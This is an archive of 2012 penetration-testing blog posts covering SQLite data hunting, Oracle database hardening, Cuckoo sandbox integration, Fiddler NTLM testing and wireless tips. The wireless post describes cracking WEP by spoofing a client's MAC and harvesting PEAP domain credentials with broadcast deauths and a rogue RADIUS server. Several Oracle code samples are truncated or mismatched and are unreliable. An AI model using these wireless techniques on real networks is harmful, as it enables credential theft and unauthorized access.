Tuesday, March 27, 2012

sqlitespy for Sqlite Database Analysis

By Gursev Kalra.

Sqlite is the ubiquitous database for iPad, iPhone and Android applications. It is also used by certain internet browsers, web application frameworks, and software products for their local storage needs. While doing penetration tests, we often see sensitive information like usernames, passwords, account numbers, SSN etc… insecurely stored in these databases. Thus, every penetration test requires comprehensive analysis of the local databases being used.

While analyzing databases, a penetration tester repeatedly does the following:

  1. Opens the database in sqlite reader (sqlite3 or other readers)
  2. Views various tables and columns to understand database layout and schema
  3. Analyzes the storage for sensitive information

As the number and size of database increases, the analysis time increases exponentially. To escape the recurring pain, I wrote a ruby script to automate this process. The script achieves the following:
  1. Analyzes multiple databases in a single run.
  2. Queries and displays database schema
  3. Provides an option to run search on Table and Column Names for quick analysis
  4. Looks for search strings in the following:
    1. Table Name
    2. Column Names
    3. Actual Data
  5. Performs case-insensitive regular expression search (default). This can be controlled with command line options to one’s requirements
  6. Displays Database, Tables and Row Number reference for every successful match
  7. Dumps database rows on a successful match


Download Link - http://www.opensecurityresearch.com/files/sqlitespy.rb.bz2

Sqlitespy dependencies are listed below
  1. Ruby - http://www.ruby-lang.org/en/
  2. Sequel Gem - http://rubygems.org/gems/sequel
  3. sqlite3 - http://sqlite.org/download.html


sqlitespy help:

sqlite sample run with multiple search strings and row information dump for a successful match:

sqlite sample run with minimal information:

sqlite database schema dump:

Tuesday, March 20, 2012

Top 10 Oracle Steps to a Secure Oracle Database Server

By Chris Stark.

There are numerous resources on the Internet that detail secure configurations for Oracle; CISecurity, NIST, SANS, and Oracle just to name a few. Despite this, however, Foundstone continues to encounter vulnerable Oracle databases in our internal and external penetration tests. More often than not, we consultants are able to leverage the vulnerable Oracle databases to compromise additional hosts. A single vulnerability in an Oracle database can eventually be escalated to privileged credentials in Active Directory or LDAP.

Why do we continue to encounter Oracle servers with misconfigurations and other vulnerabilities that can easily avoided by just a little effort by DBAs?

There are many reasons, but in my opinion these are some of the most common:
  1. Understaffed Security Teams - Simply a lack of internal or third-party security professionals to bring visibility to the importance of database security. If there are no security professionals in the organization, or ones that lack the skills or resources to perform periodic security assessments of databases, database misconfigurations will often go undetected.
  2. DBA's "don't do" security - The reality in many organizations is that DBA’s are administrators that are focused on database availability and performance and not security. DBA’s might be reluctant to implement secure configurations due to a lack of full understanding of the security risks- the vulnerability and exposure of not implementing the secure configuration, or due to fear that the secure configuration will unintentionally break some functionality. To boil it down, DBA’s might have some fear, uncertainty, and doubt (FUD) about implementing secure database configurations.
  3. !"secure by default" - Since the release of Oracle 9, Oracle has made a public effort to change their installation routines so that they are “secure by default”. However, as you will see in the settings discussed in this blog, for various reasons the majority of them are not set “secure by default”.

Even though there are excellent resources on the Internet for implementing secure Oracle configurations, they aren’t being followed. The purpose of this article is to discuss the configurations that will have the greatest impact on securing your Oracle database implementations. Hopefully, if at least these top 10 configurations are implemented on your Oracle servers, you will never be in a situation where the Oracle servers were the chink in the armor that hackers used to pwn your network.

At the time of this article, there are only two supported versions of Oracle, 10g and 11g. Therefore, the focus of the recommendations in this article are in relation to those two versions of Oracle. The following 10 recommendations are ordered by severity, with the recommendations that will have the greatest benefit to the security posture of the database server, at the top of the list.

1. Lock Down Default Accounts!

Default privileged Oracle accounts continues to be the highest risk issue that we commonly encounter. It is an incredibly easy issue to fix and prevent.

After installation, Oracle has a number of default accounts, each with a default preset value. Post database install, the Oracle database configuration assistant (DBCA) automatically locks and expires the majority of the default database user accounts. Additionally DBCA changes the SYSTEM account to the value specified during the installation routine.

If an Oracle database is manually installed, the DBCA never executes, and those dangerous default privileged accounts are never locked and expired. By default, their password is the same as their username. These will be the very first credentials that a hacker will attempt to use to connect to the database! As a best practice, configure each of these accounts with a strong unique password, and if they are not required, they should be locked and expired.

To change the password, execute the following SQL code:

sqlplus> connect mydba
sqlplus> alter user SYSTEM account lock and expire

The following SQL can be used to lock and expire those default accounts:

sqlplus> connect mydba
sqlplus> alter user SYSTEM account lock and expire

The default accounts installed with Oracle vary by version. Here is a quick reference of the accounts that are installed by default (if the DBCA is never executed) in Oracle 9, 10, and 11 in an open state.

Oracle 9 Oracle 10 – Release 1 and 2 Oracle 11

Starting with Oracle version 11g, DBA’s can easily locate any accounts with default passwords (same as username) by using the database view DBA_USERS_WITH_DEF_PWD.

2. Require all database connections to use a strong SID

The Oracle System ID, or SID is a unique value that is required for all clients to connect to the Oracle database. Because it must be unique, you cannot have more than one database with the same SID on the same Oracle server.

If a client connection uses a wrong SID to connect to an Oracle database, they'll get the message “ORA-12505: TNS:listener does not currently know of SID given in connect descriptor" SIDs can be brute forced. There are numerous tools to brute force the Oracle SID; Metasploit modules, OAT, OAK, SIDGuess, etc.

The key to thwarting SID brute forcing is to select a SID that is strong. When creating an Oracle SID, select one that includes the following elements.
  • Not a dictionary word
  • At least 10 characters in length
  • Includes at least one special character
Incorporating these elements will the SID is strong, that is, difficult for an attacker to brute force.

Why does a strong SID matter when the SID is stored as a clear-text value within the Oracle client configuration file, tnsname.ora, on every single system that is configured to connect to the database?

This is true - as long as an attacker could compromise at least one system that is configured to connect to the Oracle database, getting the SID from the TNSNAMES.ORA file is trivial. But, think about the instances where the attacker is external to the organization and has compromised a single host that does not have an Oracle client connection configured. A strong SID will not in itself prevent a hacker from gaining a connection to your Oracle database, but it is a good practice as an additional layer as a part of a Defense in Depth approach to security.

For a good white paper on the methods that can be used to obtain an Oracle SID, check out Alexander Polyakov’s white paper. The white paper is bit old, but most of the methods discussed are still relevant.

3. Apply Oracle Critical Patch Updates ASAP

This is one of those security best practice recommendations which most organizations commonly struggle. Depending on the database schema, Oracle Critical Patch Updates (CPU’s) can have significant impact on the Oracle database. Significant enough, that the organization might have to perform extensive regression testing to ensure that applying the latest Oracle CPUs would have no impact on database functionality.

Oracle releases Critical Patch Updates every quarterly on the Tuesday closest to 17th day of the month. Oracle has a special bulletin page that describes all of the most Oracle Critical Patch Updates and Advisories. Fortunately, CPU’s are cumulative in nature. You just need to install the latest Oracle CPU to gain all of the security patches from the product’s initial release.

The key to an effective CPU patch process is creating a regimented regression testing process that corresponds to Oracle’s scheduled 4 releases every year. Even in organizations with the most stringent regression testing processes, they can usually be architected in such a manner that they can be applied no more than 3 months after the last CPU release. Additionally, all DBA’s should register with the Oracle email Security Alert Advisory service, to ensure timely notification of Oracle patches and Security Alerts.

There is also a mechanism Oracle can employ if a critical vulnerability is discovered that warrants immediate patch release. Oracle calls patches released immediately under that program as off-schedule Security Alerts. Since the CPU program was begun in 2005, there has only been a few times when Oracle released patches under that emergency process. Organizations should work a method for applying these emergency released patches, but given their historic low volume, the focus should be on the routine of applying the CPU patches every quarter. Oracle has a good whitepaper on recommendations for applying CPU patches. It is an excellent resource for any organization implementing an Oracle Patch Management process.

4. Remove all unnecessary privileges from the PUBLIC role

In Oracle extended routines exist that allow a minimally privileged user to execute functions that they otherwise would not be able to execute. These extended routines are called packages, and are roughly equivalent to Extended Stored Procedures in Microsoft SQL Server. A special role, called PUBLIC, acts as a default role assigned to every user in the Oracle database. Any database user can execute privileges that are granted to PUBLIC. This is commonly exploited for database privilege escalation.

These packages and subtype should be revoked from PUBLIC and made executable for an application only when absolutely necessary!

In order of descending risk, the following table lists the most dangerous packages assigned by default that are assigned to the PUBLIC role:
Package or Subtype Description
DBMS_SQL* This package provides an interface to use dynamic SQL to parse any data manipulation language (DML) or data definition language (DDL) statement from within PL/SQL.

David Litchfield discovered the vulnerability in this package and presented it at Blackhat in 2007. He demonstrated that a user could escalate their privileges through cursor snarfing and cursor injection. This problem has been fixed in Oracle 11g, but is still present in other versions. Given that this package is extremely dangerous, and any database user can escalate to SYS, its necessity should be closely scrutinized. If native dynamic SQL is not required, the package should be removed.
DBMS_XMLGEN The DBMS_XMLGEN package converts the results of a SQL query to a canonical XML format in real-time.

An attacker can exploit this package with SQL injection. Similarly to the DBMS_SQL package, all data, including user credentials can be extracted from the database. Given that this package is extremely dangerous, its necessity should be closely scrutinized. If dynamic XML database queries are not required, the package should be removed.
UTL_TCP* This package facilitates outgoing network connections to be established by the database server to any receiving (or waiting) network service. Granting this package to PUBLIC may permit arbitrary data may to be sent between the database server and any waiting network service.
DBMS_RANDOM This package can be used to encrypt stored data. Generally, most users should not have the privilege to encrypt data- since encrypted data may be non-recoverable if the keys are not securely generated, stored, and managed, etc.
UTL_HTTP* This package allows the database server to request and retrieve data using HTTP. By default, it allows every user to access data over the Internet from HTTP. An attacker could exploit this package with an HTTP request to send a SQL injection to the database to dump user’s credentials, and other sensitive data.

According to the least privilege principle, revoke all grants to this package if your applications do not need it.
HTTPURITYPE This subprogram is a subtype of the UriType that provides support for the HTTP protocol. It uses the UTL_HTTP package underneath to access the HTTP URLs. By default, it allows every user to transfer data from the database via HTTP. An attacker could exploit this package with an HTTP request to send a SQL injection to the database to dump user’s credentials, and other sensitive data.

According to the least privilege principle, revoke all grants to this package if your applications do not need it.
DBMS_ADVISOR This package DBMS_ADVISOR is part of the Server Manageability suite of Advisors, a set of expert systems that identifies and helps resolve performance problems relating to the various database server components.

Because this package allows direct file system access, it can be used by an attacker to interact with the file system, outside of the database.
UTL_SMTP This package permits arbitrary mail messages to be sent from one arbitrary user to another arbitrary user. An attacker could use this as a part of a larger social engineering attack. Most likely your application will not need this type of functionality from the database, and you should revoke all grants to this package.
UTL_INADDR This package allows arbitrary domain name resolution to be performed from the database server, which could allow an attacker to enumerate your internal resources. According to the least privilege principle, revoke all grants to this package if your applications do not need DNS resolution.

5. Enable Database Auditing

Audit SYS Operations

By default Oracle databases do not audit SQL commands executed by the privileged SYS, and users connecting with SYSDBA or SYSOPER privileges. If your database is hacked, these privileges are going to the be the hackers first target. Fortunately auditing SQL commands of these privileged users is very simple:
sqlplus> alter system set audit_sys_operations=true scope=spfile;

Enable Database Auditing

Again, by default Oracle auditing of SQL commands is not enabled by default. Auditing should be turned on for all SQL commands. Database auditing is turned on with the audit_trail parameter:

sqlplus> alter system set audit_trail=DB,EXTENDED scope=spfile;
Note: The command above would enable auditing from the database, but not the database vault information, into the table SYS.AUD$. There are actually four database auditing types: OS, DB, EXTENDED, and XML.

Enable Auditing on Important Database Objects

Once auditing has been enabled, it can be turned on objects where an audit trail is important. The following is a list of common objects that should be audited:


6. Setup Database Triggers for Schema Auditing and Logon/Logoff Events

In order to effectively audit schema changes, and logon and logoff events, Oracle provides DDL triggers to audit all schema changes and can report the exact change, when it was made, and by which user. There are several ways to audit within Oracle with Triggers, but the three following are recommended by Alexender Kornblast with Red-Security- and I recommend all DBA’s consider implement them:

Logon Trigger

By using a logon trigger, you can send logon and logoff events in real-time to another system. Think of it as a syslog daemon for your database events.

This example below would send all logon and logoff events to a web server in real-time.

Command (as user SYS):
SQL> create or replace trigger sec_logon after logon on database
rc VARCHAR(4096);
OST')||';ip='||ora_client_ip_address||';sysdate='||to_char(sysdate, 'YYYY-MM-DD hh24:mi:ss'));
when utl_http.REQUEST_F AILED then null; end;
End sec_logon;/
NOTE: Change the IP address to your web server’s address.


Using the Data Definition Language (DDL) triggers, an Oracle DBA can automatically track all changes to the database, including changes to tables, indexes, and constraints. The data from this trigger is especially useful for change control for the Oracle DBA.

The example below will send events for GRANT, ALTER, CREATE, DROP.
Command (as user SYS):

SQL> create or replace trigger DDLTrigger
rc VARCHAR(4096);
ME='||ora_dict_obj_name||';sysdate='||to_char(sysdate, 'YYYY-MM-DD
when utl_http.REQUEST_FAILED then null; end;
NOTE: Change the IP address to your web server’s address.

Error Trigger

Error triggers are Oracle error messages. They can be useful for detecting attacks from SQL injection and other attack methods.

Command (as user SYS):
DECLARE pragma autonomous_transaction; id NUMBER;
sql_text ORA_NAME_LIST_T; v_stmt CLOB; n NUMBER;
n := ora_sql_txt(sql_text);
IF n >= 1 THEN
FOR i IN 1..n LOOP
v_stmt := v_stmt || sql_text(i);
FOR n IN 1..ora_server_error_depth LOOP
IF ora_server_error(n) in (
,'1722','1742','1756','1789','1790','24247',' 29257','29540') THEN
INSERT INTO system.oraerror VALUES (SYS_GUID() , sysdate, ora_login_user,
ora_client_ip_address, ora_server_e rror(n), ora_server_error_msg(n),
END after_error; /

NOTE: Change the IP address to your web server’s address.

7. Implement a Database Activity Monitoring (DAM) Solution

If you can afford the extra expense of an additional software product, a Database Monitoring Solution can be very useful. It solves a problem where you might not be able to monitor your DBA’s activity at an organizational level. It also provides useful insight to dangerous SQL queries and role modifications that might indicate an attacker has compromised your database. The key to all of the DAM solutions is that they operate within memory of the Oracle server and operate independently of the databases native auditing and logging functions. For anyone familiar with network Intrusion Detection Systems (IDS), DAMs have an analogous function, they just operates within the database layer on the server rather than at any of the network layers.

I’ve had really good feedback from our clients that McAfee’s Database Activity Monitoring (Formerly Sentrigo Hedgehog) is easy to implement and provides immediately useful alerts; however, I have no personal experience with the product.

8. Enable Password Management for all Oracle Logins

Oracle provides fairly robust password management for Oracle logins. Unfortunately, none of these are applied in the default Oracle account profile.

In Oracle, logins are assigned an account policy through an Oracle profile. Every login can only be applied one Oracle profile. If no Oracle profile is specified when the login is created, it is assigned the default Oracle profile.

Oracle covers the syntax for Oracle profiles well, but here are the recommended settings at a high level:

Creating Profiles

Oracle profiles are created with:

CREATE PROFILE profilename LIMIT SQL statement

Users are added to the profile with:

ALTER USER login(s) PROFILE profilename

Account Lockout

Locking accounts after 5 invalid attempts for 30 days greatly reduces the risk of brute force attacks. If 30 days is not feasible, even a setting of 1 day will greatly reduce the risk of brute force attacks.

The following two parameters are used to specify account lockouts in an Oracle profile.


Password Expiration

By expiring passwords, you can help ensure that they are being changed on a periodic basis. Expiring user passwords at least at every 90 days is a security best practice.

The following parameter is used to specify how many days can lapse before a user must change their password:

Password History

Without password history, users will most likely use the same password that they remember well each time they’ve changed it. To ensure that user’s don’t reuse passwords there are two parameters. The important thing to note that these settings are cumulative and both thresholds must match true before a user is able to change their password.

In general, a password reuse time of 1 day is sufficient in conjunction with a password reuse maximum of 10 or more.

Setting the password reuse time higher than 1 day may be problematic if users frequently change their password.

The important thing to note with these two settings is that they both should NOT be set to unlimited.


Password Complexity Verification

Without a password complexity verification function, users will most likely choose simple dictionary words that are easy to remember, and easy for a hacker to guess.

In Oracle a user PL/SQL script must be set to check the complexity of a user’s password. For specific example password verification PL/SQL scripts, refer to Oracle’s documentation.

In general, the password verification function should ensure user’s passwords incorporate the following criteria:

  1. Differs from their username
  2. Not a dictionary word
  3. At least 10 characters in length
  4. Include at least 1 alpha, 1 numeric, and 1 special character

9. Perform Regular Database Security Assessments

Every secure configuration that has been discussed in this article could be easily detected with an automated database vulnerability tool. I’m a big fan of automated database vulnerability tools as they provide an excellent quick way to quickly validate your Oracle secure configurations. Obviously these kinds of tools are only useful if you have privileges- they are intended for DBAs, auditors, and security professionals to run for regular assessments. These tools are prone to false-positives, and unfortunately they can also miss items (false-negatives), but their benefits greatly outweigh their risks.

An important thing to note with these tools is that in organizations that use them, I commonly see the special accounts that are used for performing the automated security scans are mishandled. These accounts are either highly privileged or have extensive query capabilities with query access to all objects on the database. By their nature they should be safeguarded, and a secure password profile should be applied. Ideally they should be left in an unlocked state when not actively in use.

The two products I’ve used over the years are AppDetectivePro and McAfee Security Scanner for Databases (formerly Sentrigo’s RepScan). I’ve use McAfee’s product more extensively over the past year, so I’m naturally biased. Given that bias, I prefer McAfee’s product as it easier to dynamically query the database with the tool and collect data that can be analyzed offline and outside of the tool. Some people prefer AppDetectivePro, however, as it tends to be more automated.

10. Encrypt Database Traffic

This last recommendation is rarely implemented, except in the most secure organizations. Oracle supports network level encryption by both SSL, using X.509v3 signed certificates, and native encryption without certificates.
The take away here with network level encryption, is not only that sensitive data in transit is protected when encryption is employed, but it also that the SID is protected. Without encryption, the SID can be easily enumerated through man-in-the-middle attacks.

Implementing network level encryption is too large of a topic to post the steps in this article, but Oracle has the following excellent resources on the topic:


As I've mentioned throughout this post, there are a lot of great resources on the internet. Here are some of the ones that were referenced from during the writing of this article. Note that some of the permission descriptions, etc... where taken from the below sources to be used in this article

Monday, March 19, 2012

Setting Up NTR with Cuckoo

By Melissa Augustine.

The guys over at Advanced Malware Protection (AMP) put out an awesome blog post about integrating Network Threat Response (NTR) with the Cuckoo Sandbox a little while ago and I really liked the idea so I wanted to implement it for myself.


If you're unfamiliar with the two tools, here is a quick breakdown:
  • NTR - A network analysis tool which uses multiple vectors in determining potential maliciousness. It not only uses signatures and looks for shell code, but it also does IP/domain reputation analysis as well as AV scanning of files observed on the wire. You can get a copy of a free vmware image to try out here. The VM allows you to upload pcaps for analysis, while the pay-for version allow you to set up sensors which then feed into NTR.
  • Cuckoo - A sandbox for analyzing malware. Produces a lovely report with screenshots (if the right plugin is installed), network activity, some static analysis (if an exe), behavior analysis, and static tree.

When AMP posted that blog I thought: "How awesome would this be? - 'You are analyzing a PCAP with NTR, it flags a potentially malicious file -- now you can push to Cuckoo via shared folders and it will automatically be submitted for analysis... all while still analyzing the PCAP! Nice'"

Setup Notes

Between the AMP blog post and the Cuckoo documentation you should have most of the installation covered, but I did run into a handful of problems. Here's the process and some of what was left out:

  1. Download and set up the NTR Virtual Machine
  2. Create an Ubuntu VM using the installation ISO
  3. Within the Ubuntu VM, set up and install VirtualBox.
    • The thing to remember with this is when you create a user and add them vboxuser group, you HAVE to log off and log back on for it to take affect. Restarting (apparently) does not fix it.
  4. Within the Ubuntu VM, install and set up a Windows VM (you'll need the installation media for this).
    • Install any supporting applications within the Windows VM (e.g. You may need a PDF viewer if you're using a malicious PDF)
    • When creating the shared folders for file transfers, you'll first need to install Virtual Box's "Guest Additions" first.
  5. At this point, you're ready to go through AMP's blog post. Some notes:
    • Samba Configuration: There was some disconnect on the AMP blog post in regards to setting samba up, so I took a simpler method and simply right-clicked the folders from within X Windows and used the sharing option. I did run across one tiny error, but the error itself contained the solution:

    • The watcher.rb script had a small type-o, change:
      IO.popen("./run-sample.sh /opt/ntr/samples/#{ev.name}")


      IO.popen("./run-sample.sh /opt/ntr/samples/#{event.name}")
    • run-sample.sh needs the the directory which contains cuckoo.py defined. If you do not have cuckoo.py in /opt/cuckoo you'll need to change the variable in the script or move it there
    • watcher.rb also needs executable rights on run-sample.sh. If you don't have it appropriately set, you'll get an error saying watcher.rb can't find run-sample.sh. To set:

      chmod +x run-sample.sh

    • In NTR, I had to specify my workgroup as well to mount the cuckoo share, the mount command ended up being:

      sudo mount -t cifs -o username=RainbowBrite,password=Starl1ght,domain=WORKGROUP // /mnt/cuckoo

After some blood, sweat, and coffee... this is the final result you hope to achieve (make sure you have all the scripts running and folders mounted!)

Exporting in Action

I made this quick video to demonstrate exporting to Cuckoo:

Tuesday, March 13, 2012

Fiddler and NTLM authentication

By Neelay S Shah.

I was testing a web application recently that used NTLM (over HTTP) to authenticate users. I was using Fiddler to test the web application and ran into the following problem which was hampering / slowing down my testing. I could not use the “Composer” tab to send manual requests from within Fiddler or use the “Replay Request” option from within Fiddler. In either of those 2 cases, the server would respond with “401 Unauthorized” and Fiddler would not prompt me to enter credentials and just stop. So it was really limiting my testing and reducing my efficiency. I love Fiddler and as far as possible I did not want to switch to another HTTP proxy.

As I was researching a solution/work around for this, I came across this excellent post - Fiddler and Channel Binding Tokens Revisited by Eric Law, wherein Eric suggests a workaround to problem you may encounter while using Fiddler to test web application using NTLM over HTTPS. Now in my case, the web application was not using SSL and performing NTLM authentication over clear text HTTP however I was able to make changes to the workaround Eric suggests so that it works in this scenario.

Following is the script that I added to my FiddlerScript Rules file. I strongly recommend installing the Syntax Highlighting extension - http://fiddler2.com/redir/?id=SYNTAXVIEWINSTALL before attempting to modify the FiddlerScript Rules. Once you install the Syntax Highlighting extension, launch Fiddler and you should see a new tab “FiddlerScript” (between the Composer and the Filters tab). Click the “FiddlerScript” tab and that should open the Rules file. Then you can add the following code appropriately and click “Save Script”.

You will most likely already have an OnPeekAtResponseHeaders() function in which case simply add the following code to the beginning of the OnPeekAtResponseHeaders() function. You will also have to modify the web site address and the test user credentials within the script before using it.

 // NOTE – Do NOT use this in production environment. Only use in test  
 // environment with test user credentials. All connections passing  
 // through Fiddler and directed at the concerned web application  
 // will automatically be authenticated using the embedded test user  
 // credentials  
 static function OnPeekAtResponseHeaders(oSession: Session) {  
  // To avoid problems with Channel-Binding-Tokens, this block allows  
  // Fiddler itself to respond to Authentication challenges from the  
  // web site  
  if ((oSession.responseCode == 401) &&  
   // Only permit auth to sites we trust  

   // CHANGE .web.site.url.address to whichever you're testing


   // CHANGE enter the appropriate creds here:
   oSession["X-AutoAuth"] = "domain\\username:password";    
   oSession["ui-backcolor"] = "pink";  

Once you add this code and save the Script Rules, the rule will be in effect and Fiddler will start using the same. Now, if you make a manual request using the Composer tab or Replay/Reissue requests, Fiddler will automatically handle the server “401 Unauthorized” response and authenticate using the test user credentials that are embedded in the script code. Additionally, the request session will be highlighted in faint pink color within the Fiddler “Request Response/Session List” so that simply by viewing the list you can identify which requests were hit by the rule.

Tuesday, March 6, 2012

Wireless Tipz

By Robert Portvliet and Tony Lee

Cracking WEP on Enterprise Networks

When cracking WEP on an enterprise wireless solution (e.g. Aruba, Cisco), you'll notice that many times the AP will send deauth frames once you start replaying ARP packets back into the network. There are a couple ways to circumvent this annoyance.

Impersonate a Connected Client

What works for me is to simply use the MAC address of an already associated client as the source MAC in aireplay-ng instead of my own. This seems to work quite well and only requires a few stops and starts of aireplay-ng to keep the data counter heading upwards at a reasonable rate. Brad Antoniewicz does this by crafting ICMP packets using packetforge-ng with the recovered key stream and then injecting those packets into the network. Apparently, the AP doesn’t find this behavior quite so offensive as using ARP packets.

Remain Persistent

Nick Roberts had success using fakeauth and his own MAC address for the source MAC in aireplay-ng. To be successful, you need to restart the ARP replay whenever you receive a deauth, until the fakeauth can authenticate you again.


If PEAP clients will not connect to your FreeRADIUS-WPE server even after sending directed deauths (usually due to proper client side EAP configurations)--try sending a deauth packet to the broadcast address. While the drivers in the wireless cards of most laptops will ignore it, a fair amount of mobile devices will respond to it. Because of this you won’t cause too much disruption on the wireless network and you will likely get authentication exchanges from the mobile devices as they attempt to re-authenticate. Plus mobile devices seem to be the most likely to be misconfigured for PEAP. Many employees seem to eventually figure out that they can use their domain credentials on their corporate or personal phones to connect to the corporate wireless (even though it may be against policy). Due to a lack of knowledge, the device will be insecurely configured and will connect to anything purporting to be the corporate wireless. This attack is best executed using two cards. The first card is used for listening using the FreeRADIUS-WPE server, with a hostapd frontend for the AP. The second card is used to run airodump-ng (to monitor the AP and stations being attacked) and also to send out the deauths using aireplay-ng.

As a side note: Brad Antoniewicz updated FreeRADIUS-WPE a couple months ago, use the latest version to save yourself headaches. You can find the patch and package form here: http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html

Don't Trust Just One Tool

This one is pretty basic, use more than one tool to do discovery. I’ve found that a lot of the tools will incorrectly identify SSID’s, signal strength, and channel, at least some of the time for whatever sundry reasons. Consequently, you might consider using tools such as airodump-ng, Kismet, and Airmagnet PRO to do discovery. Using multiple tools can provide a good consensus of how things actually look, allowing a more accurate plan of action.

Picking the Best Wireless Adapter

In regards to which cards work best for monitor mode, injection, etc. I can say I’ve always had good results with the Ubiquiti SRC300 a/b/g card, which a lot of folks use. Recently I’ve been using the Ubiquiti SRC71-C, and SR-71-E cards, (both a/b/g/n) which I’ve had good luck with as well. I also like the Alpha AWUS036H. It’s reliable, it is USB so it will work in a VM (although this gives weird results sometimes and I don’t prefer it), and the 1-watt of power is helpful when you need range. It’s also pretty cheap at $27. The only downside is it’s b/g only. The card I use for discovery and rogue hunting in Airmagnet is the Ubiquiti SR71-USB, the reason being that it covers a/b/g/n, and can be used in any laptop with a USB port. I haven’t had any luck with it for injection though, and haven’t heard of anyone else having any luck with it either, unfortunately

MAC Address Trends

You can use the OUI and the last byte of the AP’s BSSID to figure out what AP’s/SSID’s belong to your target organization. This is a simple one, but I see people ignoring it quite a bit. Firstly, most organizations have equipment from the same manufacturer, so their OUI (the first 3 bytes of the BSSID) is going to be one of a couple values for all their AP’s. Secondly, on any given AP, they will likely have multiple SSID’s, with the 4th and 5th bytes of the BSSID for each SSID being the same and the last being sequential (8A, 8B, 8C, etc), which would indicate that these are all on the same AP. This is helpful when determining that the SSID you would like to attack belongs to your target organization. This observation also helps when rogue AP hunting, combined with signal strength, to help determine whether the SSID you are looking at is a possible rogue or not. This isn’t really an exact science as someone could spoof a corporate MAC address to hide a rogue, but it helps sort things out when you have a large number of SSID’s flying around.

Rogue AP Hunting

Speaking of rogue hunting, Tony Lee wrote up a short ‘how to’ on rogue hunting with airodump-ng that I’d like to share as my final tip.

  1. Put card in monitor mode:

    airmon-ng start wlan0
  2. Initial Survey and Discovery (note: If the network is n-only, you will miss it):

    airodump-ng --band abg --write Disc mon0
  3. Monitor new AP’s that show up (in another tab type the following)

    Watch head –n 30 Disc-01.csv

    Get a cart with wheels and slowly walk a planned route covering the entire floor space. Flip periodically between the tab with airodump and the tab watching the csv file while you are rolling—it is very useful for discovery and later ideas for what may be a rogue and generally where it is. It may be helpful to make a note of where you were if you see a strange network name show up.
  4. Analyze the discovered networks with the client after the walk in order to eliminate known APs:

    less Disc-01.csv

    Note the ESSID, BSSID (MAC of AP), and the channel of the unidentifiable rogue APs—you will need this info to track them down.
  5. Find the Rogues

    airodump-ng --band abg --bssid [BSSID] --write [ESSID] mon0

    (All of that information is what you noted in the step above)

    This will allow you to focus on finding only one rogue at a time. Watch the PWR indicator to see how close it is.

How close is that AP?

Below are general guidelines as to proximity of the AP based off of the PWR indicator in airodump:

50-60: Really close, look around you. A few arms lengths away.
30-50: ~10-15 ft away
10-30: In sight, but get closer
1-10: It is far away, maybe a floor or two above or below you, other end of the office, or potentially next building over.